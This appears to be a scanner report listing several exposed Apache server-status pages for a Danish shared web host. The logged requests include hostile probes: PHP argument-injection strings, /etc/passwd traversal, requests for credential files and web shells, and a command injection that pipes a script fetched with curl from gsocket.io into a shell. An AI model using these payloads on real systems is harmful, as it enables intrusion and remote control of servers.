34.46.94.230webhotel5.webhosting.dkBf)--+qODp&match_day=1&match_day=1&team_id=1&team_id=1 HTTP/1.0 46-5-0/0/50. 0.11141210.00.000.01 34.46.94.230webhotel5.webhosting.dkl=true&passed_id=1&passed_ent_id=1&mailbox=/etc/passwd HTTP/1.0 47-5-0/0/50. 0.1283000.00.000.03 192.145.125.68webhotel5.webhosting.dkGET /word.php HTTP/1.0 48-5-0/0/50. 0.1282300.00.000.03 192.145.125.68webhotel5.webhosting.dkGET /wp-includes/customize/plugins.php HTTP/1.0 49-5-0/0/50. 0.10822<
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde36f52a3d0
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Monday, 14-Oct-2024 05:59:14 CEST Restart Time: Monday, 14-Oct-2024 04:00:15 CEST Parent Server Generation: 1 Server uptime: 1 hour 58 minutes 58 seconds Total accesses: 9830 - Total Traffic: 5.6 MB CPU Usage: u1.76 s.98 cu0 cs0 - .0384% CPU load 1.38 requests/sec - 817 B/second - 593 B/request 1 requests currently being processed, 33 idle workers ________._______________________W__............................. ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-1428120/25/293_ 0.052800.00.010.09 71.140.151.165webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 1-1428220/25/293_ 0.0626120.00.010.10 83.97.73.245webhotel5.webhosting.dkGET /?XDEBUG_SESSION_START=phpstorm HTTP/1.0 2-1428230/25/293_ 0.052500.00.010.10 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 3-1428330/25/293_ 0.061500.00.010.09 45.92.33.82webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 4-1428340/25/293_ 0.051210.00.010.08 4.213.67.123webhotel5.webhosting.dkGET /.well-known/ HTTP/1.0 5-1428350/25/293_ 0.051000.00.010.09 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 6-1428360/24/292_ 0.06471040.00.010.09 141.138.208.43webhotel5.webhosting.dkGET / HTTP/1.0 7-1428530/24/291_ 0.054700.00.010.47 93.158.71.185webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 8-1-0/0/268. 0.0866600.00.001.23 156.146.33.80webhotel5.webhosting.dkGET /profile.php HTTP/1.0 9-1428540/24/292_ 0.06471060.00.010.09 35.223.104.159webhotel5.webhosting.dkGET / HTTP/1.0 10-1428550/24/292_ 0.044600.00.010.09 93.235.145.106webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 11-1428560/24/291_ 0.054200.00.010.10 187.190.171.225webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 12-1428570/24/292_ 0.053800.00.010.08 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 13-1428580/24/292_ 0.073900.00.010.20 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 14-1428590/24/291_ 0.043400.00.010.09 89.248.163.208webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 15-1428600/24/291_ 0.053110.00.010.08 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 16-1428630/24/291_ 0.05900.00.010.37 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 17-1427020/30/247_ 0.062000.00.010.18 154.21.202.251webhotel5.webhosting.dkPOST /wp-login.php HTTP/1.0 18-1427030/30/246_ 0.052000.00.010.20 4.213.67.123webhotel5.webhosting.dkGET /wp-admin/css/ HTTP/1.0 19-1427040/30/247_ 0.062000.00.010.28 154.21.202.251webhotel5.webhosting.dkGET /wp-admin/ HTTP/1.0 20-1428640/24/241_ 0.05700.00.010.09 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 21-1428650/24/241_ 0.04500.00.010.08 4.213.67.123webhotel5.webhosting.dkGET /sites/default/files/ HTTP/1.0 22-1428660/24/241_ 0.043680.00.010.09 35.196.11.12www.karenborup.dkGET /index_files/editdata.mso HTTP/1.0 23-1428670/24/229_ 0.07070.00.010.07 64.225.75.246webhotel5.webhosting.dkGET / HTTP/1.0 24-1428680/24/224_ 0.05070.00.030.09 64.225.75.246webhotel5.webhosting.dkGET / HTTP/1.0 25-1428690/24/224_ 0.06000.00.010.07 64.225.75.246webhotel5.webhosting.dkGET /server HTTP/1.0 26-1428700/24/224_ 0.05000.00.010.07 64.225.75.246webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 27-1428710/24/224_ 0.05000.00.010.07 64.225.75.246webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 28-1428720/24/224_ 0.05010.00.020.13 64.225.75.246webhotel5.webhosting.dkGET /about HTTP/1.0 29-1428730/24/224_ 0.07010.00.010.10 64.225.75.246webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 30-1428740/24/224_ 0.05000.00.010.07 64.225.75.246webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 31-1428750/24/241_ 0.05010.00.010.08 64.225.75.246webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 32-1428760/23/242W 0.05000.00.010.08 64.225.75.246webhotel5.webhosting.dkGET /server-status HTTP/1.0 33-1428770/23/190_ 0.054900.00.010.05 89.248.163.208webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 34-1428780/23/189_ 0.054810.00.010.07 93.235.145.106webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 35-1-0/0/117. 0.10124000.00.000.03 78.153.140.218webhotel5.webhosting.dkGET /app_dev.php/_profiler/phpinfo HTTP/1.0 36-1-0/0/116. 0.10123900.00.000.03 78.153.140.218webhotel5.webhosting.dkGET /staging/.env HTTP/1.0 37-1-0/0/117. 0.11124000.00.000.04 78.153.140.218webhotel5.webhosting.dkGET /test/.env HTTP/1.0 38-1-0/0/117. 0.14123900.00.000.03 78.153.140.218webhotel5.webhosting.dkGET /app_dev.php/_profiler/phpinfo HTTP/1.0 39-1-0/0/100. 0.1066740.00.000.03 156.146.33.80webhotel5.webhosting.dkGET /wp-content/themes/seotheme/db.php?u HTTP/1.0 40-1-0/0/100. 0.1166700.00.000.04 156.146.33.80webhotel5.webhosting.dkGET /inc.php HTTP/1.0 41-1-0/0/50. 0.1266700.00.000.02 156.146.33.80webhotel5.webhosting.dkGET /tinyfilemanager/tinyfilemanager.php HTTP/1.0 42-1-0/0/50. 0.0966700.00.000.02 156.146.33.80webhotel5.webhosting.dkGET /ty.php HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache Server at www.go4love.dk Port 80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde3bb8d0896
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Saturday, 12-Oct-2024 06:04:26 CEST Restart Time: Saturday, 12-Oct-2024 04:00:10 CEST Parent Server Generation: 2 Server uptime: 2 hours 4 minutes 16 seconds Total accesses: 8537 - Total Traffic: 2.7 MB CPU Usage: u.9 s.38 cu0 cs0 - .0172% CPU load 1.14 requests/sec - 377 B/second - 329 B/request 1 requests currently being processed, 33 idle workers _______________W__________________.............................. ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-221310/9/250_ 0.02100.00.000.07 45.91.200.166webhotel5.webhosting.dkGET /wp-content/plugins/Core-Econ/upH.php HTTP/1.0 1-221320/9/249_ 0.021100.00.000.11 89.248.163.130webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 2-221330/9/249_ 0.011000.00.000.07 45.91.200.166webhotel5.webhosting.dkGET /wp-content/plugins/admin.php HTTP/1.0 3-221340/9/249_ 0.01260.00.000.06 198.235.24.28webhotel5.webhosting.dkGET / HTTP/1.0 4-221350/9/249_ 0.021010.00.000.07 81.19.232.89webhotel5.webhosting.dkGET / HTTP/1.0 5-221360/9/249_ 0.03810.00.000.08 45.91.200.166webhotel5.webhosting.dkGET /xmlrpc.php HTTP/1.0 6-221370/9/249_ 0.02700.00.000.07 89.248.163.130webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 7-221380/9/247_ 0.03700.00.000.08 89.248.163.130webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 8-221390/9/247_ 0.02310.00.010.10 81.19.232.105www.woodwind.dk20%2522$(curl%2520-fsSL%2520https://gsocket.io/y)%2522 HTTP/1.0 9-221400/9/246_ 0.03050.00.000.06 157.230.19.140webhotel5.webhosting.dkGET / HTTP/1.0 10-221410/9/246_ 0.02000.00.000.06 157.230.19.140webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 11-221420/9/246_ 0.03000.00.000.08 157.230.19.140webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 12-221430/9/246_ 0.03000.00.000.07 157.230.19.140webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 13-221440/9/246_ 0.02000.00.000.06 157.230.19.140webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 14-221450/9/246_ 0.02000.00.000.08 157.230.19.140webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 15-221460/8/219W 0.03000.00.000.06 157.230.19.140webhotel5.webhosting.dkGET /server-status HTTP/1.0 16-221470/8/245_ 0.031300.00.000.08 198.48.92.26webhotel5.webhosting.dkwp-content/uploads/2016/11/Gyngehest-gave-til-baby.png HTTP/1.0 17-221480/8/245_ 0.021200.00.000.09 24.116.221.186webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 18-221490/8/245_ 0.011200.00.000.09 111.67.101.205www.woodwind.dksh%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.0 19-221620/8/245_ 0.011100.00.000.07 34.219.237.204webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 20-221730/8/245_ 0.021100.00.000.08 89.248.163.130webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 21-221840/8/244_ 0.031100.00.000.11 89.248.163.130webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 22-221950/8/244_ 0.011010.00.000.07 81.19.232.105www.woodwind.dk20%2522$(curl%2520-fsSL%2520https://gsocket.io/y)%2522 HTTP/1.0 23-222050/8/244_ 0.01800.00.000.07 149.50.96.82webhotel5.webhosting.dkGET /wp-includes/ HTTP/1.0 24-222880/8/244_ 0.01710.00.000.07 81.19.232.105www.woodwind.dksh%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.0 25-223020/8/243_ 0.02700.00.000.07 89.248.163.130webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 26-223160/8/243_ 0.023460.00.000.06 89.248.163.130webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 27-223350/8/240_ 0.02000.00.000.08 157.230.19.140webhotel5.webhosting.dkGET /server HTTP/1.0 28-223540/8/239_ 0.01000.00.000.09 157.230.19.140webhotel5.webhosting.dkGET /about HTTP/1.0 29-236370/4/236_ 0.00700.00.000.07 89.248.163.130webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 30-236530/4/236_ 0.00500.00.010.10 111.67.101.205www.woodwind.dksh%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.0 31-221300/11/197_ 0.031100.00.000.05 89.248.163.130webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 32-236540/4/166_ 0.00400.00.000.06 45.91.200.166webhotel5.webhosting.dkGET /wp-admin.php HTTP/1.0 33-242730/1/135_ 0.010110.00.000.03 157.230.19.140webhotel5.webhosting.dkGET / HTTP/1.0 34-1-0/0/124. 0.11130800.00.000.03 45.91.200.166webhotel5.webhosting.dkGET /wp-includes/ID3/index.php HTTP/1.0 35-1-0/0/74. 0.1260600.00.000.03 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 36-1-0/0/74. 0.1061000.00.000.02 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 37-1-0/0/74. 0.1060500.00.000.02 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 38-1-0/0/74. 0.0960500.00.000.03 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 39-0-0/0/24. 0.08385700.00.000.01 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 40-0-0/0/24. 0.06385700.00.000.01 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache Server at www.go4love.dk Port 80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde39d69c66f
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Thursday, 10-Oct-2024 04:43:04 CEST Restart Time: Thursday, 10-Oct-2024 04:00:06 CEST Parent Server Generation: 0 Server uptime: 42 minutes 57 seconds Total accesses: 2180 - Total Traffic: 1.1 MB CPU Usage: u1.17 s.46 cu0 cs0 - .0633% CPU load .846 requests/sec - 444 B/second - 525 B/request 1 requests currently being processed, 30 idle workers __W____________________________................................. ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-0302350/15/65_ 0.04010.00.000.02 46.101.111.185webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 1-0305480/14/64_ 0.033120.00.000.02 89.22.233.113webhotel5.webhosting.dkOST /wp-admin/admin-ajax.php?action=_ning_upload_image HTTP/1.0 2-0302540/14/64W 0.02000.00.010.02 46.101.111.185webhotel5.webhosting.dkGET /server-status HTTP/1.0 3-0305490/14/64_ 0.043100.00.000.02 139.59.91.147webhotel5.webhosting.dkGET /favicon.ico HTTP/1.0 4-0302610/14/64_ 0.024400.00.000.28 20.171.206.49webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 5-0303360/14/64_ 0.043650.00.000.02 139.59.91.147webhotel5.webhosting.dkGET / HTTP/1.0 6-0302630/14/64_ 0.024210.00.000.02 185.242.177.19webhotel5.webhosting.dkGET / HTTP/1.0 7-0303090/14/63_ 0.044110.00.000.02 185.242.177.19webhotel5.webhosting.dkGET / HTTP/1.0 8-0303100/14/64_ 0.043760.00.000.02 139.59.91.147webhotel5.webhosting.dkGET / HTTP/1.0 9-0303110/14/64_ 0.033700.00.000.02 139.59.91.147webhotel5.webhosting.dkGET /favicon.ico HTTP/1.0 10-0305320/14/64_ 0.043100.00.050.07 54.36.148.164webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 11-0305660/14/64_ 0.053050.00.000.02 54.36.148.146webhotel5.webhosting.dkGET / HTTP/1.0 12-0305670/14/64_ 0.0422190.00.020.03 206.168.34.193www.conslip.dkGET / HTTP/1.0 13-0305680/14/64_ 0.052750.00.000.02 206.168.34.193webhotel5.webhosting.dkGET / HTTP/1.0 14-0305690/14/64_ 0.041820.00.000.03 185.211.59.11webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 15-0307700/14/64_ 0.0421120.00.000.02 206.168.34.193www.conslip.dkGET /favicon.ico HTTP/1.0 16-0307750/14/64_ 0.0419980.00.000.02 31.187.70.63webhotel5.webhosting.dkGET / HTTP/1.0 17-0307760/14/64_ 0.031870.00.000.02 20.171.206.44webhotel5.webhosting.dkGET / HTTP/1.0 18-0307790/14/64_ 0.061580.00.000.03 136.143.177.50webhotel5.webhosting.dkGET / HTTP/1.0 19-0307810/14/64_ 0.041160.00.000.02 194.67.210.77webhotel5.webhosting.dkHEAD / HTTP/1.0 20-0307820/14/64_ 0.04101060.00.000.02 15.204.182.106webhotel5.webhosting.dkGET / HTTP/1.0 21-0307850/14/64_ 0.03500.00.000.02 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 22-0307880/14/64_ 0.05060.00.000.02 46.101.111.185webhotel5.webhosting.dkGET / HTTP/1.0 23-0307890/14/64_ 0.06050.00.000.02 46.101.111.185webhotel5.webhosting.dkGET / HTTP/1.0 24-0308040/14/64_ 0.03000.00.000.03 46.101.111.185webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 25-0308770/15/65_ 0.03010.00.000.02 46.101.111.185webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 26-0309040/13/63_ 0.04000.00.000.02 46.101.111.185webhotel5.webhosting.dkGET /server HTTP/1.0 27-0309060/14/64_ 0.04000.00.000.02 46.101.111.185webhotel5.webhosting.dkGET /about HTTP/1.0 28-0309330/13/63_ 0.04000.00.000.03 46.101.111.185webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 29-0309420/14/64_ 0.02000.00.000.02 46.101.111.185webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 30-0319710/11/61_ 0.023000.00.000.03 89.22.233.113webhotel5.webhosting.dkGET /506f6f603b5c.php HTTP/1.0 31-0-0/0/50. 0.1271420.00.000.01 81.19.232.89webhotel5.webhosting.dkGET / HTTP/1.0 32-0-0/0/50. 0.1070900.00.000.03 212.39.161.243webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 33-0-0/0/50. 0.1269800.00.000.06 130.226.228.89webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 34-0-0/0/50. 0.1469660.00.000.01 130.226.228.89webhotel5.webhosting.dkGET / HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache Server at www.go4love.dk Port 80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde32cb83436
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Tuesday, 08-Oct-2024 04:20:15 CEST Restart Time: Tuesday, 08-Oct-2024 04:00:08 CEST Parent Server Generation: 0 Server uptime: 20 minutes 6 seconds Total accesses: 1638 - Total Traffic: 515 kB CPU Usage: u2.4 s1.35 cu0 cs0 - .311% CPU load 1.36 requests/sec - 437 B/second - 321 B/request 1 requests currently being processed, 34 idle workers ________________________W__________............................. ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-0203710/48/48_ 0.122150.00.020.02 117.13.169.204webhotel5.webhosting.dkGET / HTTP/1.0 1-0203720/48/48_ 0.10010.00.020.02 206.81.24.74webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 2-0203730/47/47_ 0.102300.00.010.01 98.81.130.45webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 3-0203740/47/47_ 0.122390.00.020.02 194.67.210.77webhotel5.webhosting.dkHEAD / HTTP/1.0 4-0203750/47/47_ 0.101800.00.010.01 80.82.76.214webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 5-0203760/47/47_ 0.101800.00.010.01 216.244.66.245webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 6-0203770/48/48_ 0.111700.00.010.01 80.82.76.214webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 7-0203780/46/46_ 0.081700.00.010.01 80.82.76.214webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 8-0203790/47/47_ 0.111370.00.010.01 205.210.31.232webhotel5.webhosting.dkGET / HTTP/1.0 9-0203800/47/47_ 0.101000.00.020.02 185.211.59.11webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 10-0203810/47/47_ 0.116100.00.010.01 159.148.128.253webhotel5.webhosting.dkGET / HTTP/1.0 11-0203820/47/47_ 0.12660.00.010.01 62.182.81.85webhotel5.webhosting.dkGET / HTTP/1.0 12-0203830/47/47_ 0.12570.00.010.01 62.182.81.85webhotel5.webhosting.dkGET / HTTP/1.0 13-0203840/47/47_ 0.10300.00.010.01 80.82.76.214webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 14-0203850/47/47_ 0.09500.00.030.03 216.244.66.200webhotel5.webhosting.dkGET /efterisolering-af-din-bolig/feed HTTP/1.0 15-0203860/47/47_ 0.092890.00.010.01 40.77.167.72webhotel5.webhosting.dkGET / HTTP/1.0 16-0203870/47/47_ 0.11100.00.010.01 80.82.76.214webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 17-0203880/47/47_ 0.15090.00.010.01 206.81.24.74webhotel5.webhosting.dkGET / HTTP/1.0 18-0203890/47/47_ 0.11060.00.010.01 206.81.24.74webhotel5.webhosting.dkGET / HTTP/1.0 19-0203900/47/47_ 0.10100.00.020.02 216.244.66.200webhotel5.webhosting.dkGET /plader-og-gips/krydsfiner HTTP/1.0 20-0203910/47/47_ 0.13010.00.020.02 206.81.24.74webhotel5.webhosting.dkGET /server HTTP/1.0 21-0203920/47/47_ 0.10000.00.010.01 206.81.24.74webhotel5.webhosting.dkGET /about HTTP/1.0 22-0203930/47/47_ 0.09000.00.010.01 206.81.24.74webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 23-0203950/47/47_ 0.10000.00.020.02 206.81.24.74webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 24-0203960/46/46W 0.13000.00.010.01 206.81.24.74webhotel5.webhosting.dkGET /server-status HTTP/1.0 25-0203970/47/47_ 0.10000.00.010.01 206.81.24.74webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 26-0203980/47/47_ 0.10000.00.010.01 206.81.24.74webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 27-0204040/46/46_ 0.124500.00.010.01 66.249.84.199webhotel5.webhosting.dkGET /feed HTTP/1.0 28-0204050/46/46_ 0.114500.00.010.01 212.39.161.243webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 29-0204060/46/46_ 0.134000.00.010.01 157.55.39.225webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 30-0204070/46/46_ 0.092600.00.010.01 81.19.232.105www.brandstation.infoGET /RDWeb/Pages/en-US/login.aspx HTTP/1.0 31-0204080/46/46_ 0.123450.00.010.01 147.185.132.82webhotel5.webhosting.dkGET / HTTP/1.0 32-0204090/46/46_ 0.092600.00.010.01 80.82.76.214webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 33-0204100/46/46_ 0.09321000.00.010.01 40.77.167.4webhotel5.webhosting.dkGET / HTTP/1.0 34-0204110/46/46_ 0.113010.00.010.01 81.19.232.89webhotel5.webhosting.dkGET / HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache Server at www.go4love.dk Port 80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde38c018e92
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Sunday, 06-Oct-2024 19:59:14 CEST Restart Time: Sunday, 06-Oct-2024 16:05:03 CEST Parent Server Generation: 3 Server uptime: 3 hours 54 minutes 11 seconds Total accesses: 15496 - Total Traffic: 9.4 MB CPU Usage: u2.88 s1.45 cu0 cs0 - .0308% CPU load 1.1 requests/sec - 704 B/second - 638 B/request 1 requests currently being processed, 31 idle workers ______.________.........._W__..______________................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-3138500/38/487_ 0.08200.00.010.16 172.105.16.105webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 1-3132200/43/506_ 0.132890.00.010.17 13.38.70.4webhotel5.webhosting.dkGET / HTTP/1.0 2-3138440/38/489_ 0.09700.00.010.15 173.252.83.21webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 3-3138450/38/489_ 0.097110.00.151.38 112.86.225.225www.discteknik.dkGET / HTTP/1.0 4-3138460/38/489_ 0.08270.00.020.23 172.105.16.105webhotel5.webhosting.dkGET / HTTP/1.0 5-3138470/38/490_ 0.08250.00.020.41 172.105.16.105webhotel5.webhosting.dkGET / HTTP/1.0 6-3-0/0/450. 0.14151500.00.000.18 40.77.167.224webhotel5.webhosting.dkGET /restaurant-1/ HTTP/1.0 7-3138510/38/486_ 0.07210.00.010.16 66.249.64.232webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 8-3138520/38/485_ 0.07100.00.010.39 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 9-3138530/38/485_ 0.11100.00.010.15 172.105.16.105webhotel5.webhosting.dkGET /server HTTP/1.0 10-3138540/38/483_ 0.08160.00.010.17 66.249.64.231webhotel5.webhosting.dkGET / HTTP/1.0 11-3138550/38/487_ 0.08100.00.010.16 172.105.16.105webhotel5.webhosting.dkGET /about HTTP/1.0 12-3138560/38/482_ 0.08100.00.010.19 172.105.16.105webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 13-3138570/38/483_ 0.09000.00.110.26 172.105.16.105webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 14-3138660/38/482_ 0.08000.00.020.26 172.105.16.105webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 15-3-0/0/407. 0.11151700.00.000.18 89.248.163.208webhotel5.webhosting.dkPOST 